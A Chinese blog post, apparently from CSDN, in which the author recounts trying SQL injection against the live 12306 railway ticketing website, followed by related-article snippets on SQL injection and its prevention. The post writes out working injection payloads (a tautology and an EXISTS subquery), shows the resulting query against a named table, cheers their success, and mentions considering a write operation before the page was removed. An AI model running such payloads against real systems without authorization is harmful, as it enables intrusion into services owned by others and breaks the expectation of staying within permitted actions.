玩玩12306的SQL注入漏洞

最新推荐文章于 2021-10-22 04:43:21 发布
最新推荐文章于 2021-10-22 04:43:21 发布
阅读量4.6k 收藏 2
点赞数 3
分类专栏: SQL/noSQL
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/linvo/article/details/8026373
版权

下午那会儿微博上疯传一张12306的SQL注入漏洞截图:


以前没怎么玩过,那会儿正好有空,所以就上去瞅瞅。

根据trace提示简单构造一个:

' OR '1'='1' OR ZIZ='

注入后的效果应就是:

select * from TB_INFO_CLCS  where flag = 'Y'  and czdm ='G' and cxdm like '%' OR '1'='1' OR ZIZ='%' order by cxdm


果了个然~!成功鸟~!

同理再构造个子查询:

' AND EXISTS (SELECT * FROM TB_INFO_CLCS) OR  ZIZ='

没报错,又成功鸟~!

当我正在考虑是否搞个写操作的时候,铁道部迅速撤下了相关页面:


晚上回家后发现该漏洞已经修复鸟~~~~~~

Linvo
关注
  • 3
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
专栏目录
SQL注入漏洞全接触.ppt
11-15
SQL注入漏洞全接触.ppt
html sql注入_智能化扫描场景分析—精细化扫描SQL注入漏洞
weixin_39695241的博客
11-26 213
SQL注入漏洞,是攻击者对数据库进行攻击的常用手段之一,其本质是攻击者输入的数据可以被当做代码来执行,进而获取到数据库的控制权限。由于危险等级和出现频次常常较高,SQL注入漏洞正无时无刻不受到企业安全人员的重视。先来看以下几组数据。OWASP在2013年和2017年先后发布了两个版本的《Top 10 Web应用程序安全风险报告》,随着Web应用架构和技术的不断发展,应用程序的基础技术和结构发生了重...
Pikachu漏洞靶场系列之SQL注入
weixin_45868644的博客
10-22 2672
文章目录1.概述1.1.发生原因1.2.注入点类型1.3.SQL注入流程2.数字型注入(POST)2.1.简易2.2.拓展3.字符型注入(GET)4.搜索型注入4.1.拓展5.XX型注入6.insert/update/delete注入6.1.基于函数报错注入总结 1.概述 1.1.发生原因 Web应用程序对用户输入的合法性没有判断或者过滤不严,用户在输入的字符串之中注入SQL指令,导致这些注入进去的恶意指令被数据库误认为是正常的SQL指令而运行,因此遭到破坏或是入侵。 比如我们期望用户输入整数的id,但是
吐槽一下12306SQL注入漏洞
weixin_34194379的博客
12-27 105
为什么80%的码农都做不了架构师?>>> ...
12306 SQL注入
vagabond1的专栏
09-28 1943
更可笑的最基本的“SQL 注入”都不防止。你用Hibernate 也就罢了,居然不用其对象方法,而是直接拼装 SQL 语句,这要多菜鸟的水平才做得出来啊。测试,框架,规范设计都是作坊式的才写得出来。就是我的开发组都不会犯这样的错误。 Hibernate 虽然开发方便,但是存在严重的效率问题。Hibernate 不适合大数据类型开发是人所共知的事情。 http://www.wooyun.org/
SQL注入漏洞演示源代码
09-29
SQL注入漏洞演示源代码 更多免费资源请查看:http://download.csdn.net/user/php_fly
SQL注入漏洞全接触
03-03
用户可以提交一段数据库查询代码,根据程序返回的结果,获得某些他想得知的数据,这就是所谓的SQLInjection,即SQL注入SQL注入是从正常的WWW端口访问,而且表面看起来跟一般的Web页面访问没什么区别,所以目前市面...
12306曝光sql注入漏洞,我试着发布解决方案
weixin_34007906的博客
09-29 85
12306曝光sql注入漏洞,我试着发布解决方案 在项目中,运用Ibatis中Like写法,没有研究下,结果SQL语句存在SQL注入,整理下,下次谨记啊! sql语句: select * from ( select 1 from poll <dynamic prepend= " where ...
sql注入攻击详解(原理理解)
~ Caesar's wish书屋 ~
12-14 3万+
前段时间,在很多博客和微博中暴漏出了12306铁道部网站的一些漏洞,作为这么大的一个项目,要说有漏洞也不是没可能,但其漏洞确是一些菜鸟级程序员才会犯的错误。其实sql注入漏洞就是一个。作为一个菜鸟小程序员,我对sql注入的东西了解的也不深入,所以抽出时间专门学习了一下。现在把学习成果分享给大家,希望可以帮助大家学习。下面我们就来看一下。 一、什么是sql注入呢?    
机器学习之简单线性回归demo
钱佳佳的博客
03-15 788
# -*- encoding=utf-8 -*- #简单现行回归:只有一个自变量 y=k*x+b 预测使 (y-y*)^2 最小 import numpy as np def fitSLR(x,y): n=len(x) dinominator = 0 numerator=0 for i in range(0,n): numerator += (x
Java程序员从笨鸟到菜鸟之(一百)sql注入***详解(一)sql注入原理详解
weixin_33701564的博客
10-24 188
前段时间,在很多博客和微博中暴漏出了12306铁道部网站的一些漏洞,作为这么大的一个项目,要说有漏洞也不是没可能,但其漏洞确是一些菜鸟级程序员才会犯的错误。其实sql注入漏洞就是一个。作为一个菜鸟小程序员,我对sql注入的东西了解的也不深入,所以抽出时间专门学习了一下。现在把学习成果分享给大家,希望可以帮助大家学习。下面我们就来看一下。 ...
SQL注入攻击常见方式及测试方法
热门推荐
Lambda_Y的博客
11-04 11万+
本文主要针对SQL注入的含义、以及如何进行SQL注入和如何预防SQL注入让小伙伴有个了解。适用的人群主要是测试人员,了解如何进行SQL注入,可以帮助我们测试登录、发布等模块的SQL攻击漏洞,至于如何预防SQL注入,按理说应该是开发该了解的事情~但是作为一个棒棒的测试,搞清楚原理是不是能让我们更加透彻地理解bug的产生原因呢~好啦,话不多说,进入正题~ 如何理解SQL注入(攻击)? SQL注入
sql注入漏洞的三种类型及演示
Imageel的博客
03-24 5966
1.数字型注入 首先还是根据之前的操作先后打开phpstudy,firefox以及burpsuite 在pikachu中选中sql-inject中的数字型注入,然后点击一下1或任意userid,让burpsuite抓到这部操作的数据包 将抓到的数据包传到repeater。 在传入的id处加入数字型注入的关键 id=1 or 1=1.此操作将其默认判断为真 在render处即可发现所有的user...
SQL注入问题总结
mmdev
03-19 363
一、SQL注入介绍 SQL注入就是将原本的SQL语句的逻辑结构改变,使得SQL语句的执行结果和原本开发者的意图不一样; 方法:在表单中将命令当作用户输入提交给程序; 二、SQL注入范例 这里我们根据用户登录页面 &lt;form action="" &gt; 用户名:&lt;input type="text" name="username"&gt;&lt;br/&..
SQL注入攻击演示代码
qiangzhuangchao4049的博客
04-10 1430
数据库截图: package TestJDBC;import java.sql.Connection; import java.sql.DriverManager; import java.sql.ResultSet; import java.sql.Statement;/** * sql注入攻击的演示代码 * @author Administrator * */ public class
sql注入漏洞挖掘实战
最新发布
08-31
SQL注入漏洞挖掘实战是指通过利用SQL注入漏洞漏洞挖掘活动。SQL注入漏洞是一种常见的数据库攻击手段,用于利用应用程序对用户输入的SQL语句进行不当处理,从而导致恶意用户可以执行未经授权的数据库操作。这些操作包括读取、修改或删除数据库中的数据。 在SQL注入漏洞挖掘实战中,黑客通常会尝试通过构造特定的SQL语句来绕过应用程序的输入验证和过滤机制,以获取敏感信息或对数据库进行恶意操作。他们可能会使用各种技术和工具来自动化这个过程,并尝试发现和利用潜在的SQL注入漏洞。 为了防止SQL注入漏洞挖掘实战,开发人员应该采取以下措施: 1. 输入验证和过滤: 应用程序应该对用户输入进行严格的验证和过滤,确保只允许合法的字符和格式。使用参数化查询或预编译语句可以有效预防SQL注入攻击。 2. 最小权限原则: 数据库用户应该被授予最低权限,以限制对数据库的访问和操作。这样即使发生SQL注入攻击,黑客也只能执行有限的操作。 3. 安全编码实践: 开发人员应该熟悉安全编码实践,并使用安全的API和框架来构建应用程序。避免将用户输入直接拼接到SQL查询中,而是使用参数化查询或预编译语句。 4. 定期漏洞扫描和安全测试: 定期进行漏洞扫描和安全测试,以发现和修复潜在的SQL注入漏洞。这可以帮助及早发现和解决问题,确保应用程序的安全性。 总结起来,SQL注入漏洞挖掘实战是黑客利用SQL注入漏洞进行恶意攻击的活动。为了防止这种漏洞的利用,开发人员需要采取一系列安全措施,包括输入验证和过滤、最小权限原则、安全编码实践和定期漏洞扫描和安全测试。这些措施可以帮助保护应用程序免受SQL注入漏洞的威胁。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [SQL注入攻击实战演示(附源码)](https://blog.csdn.net/hack0919/article/details/129880265)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值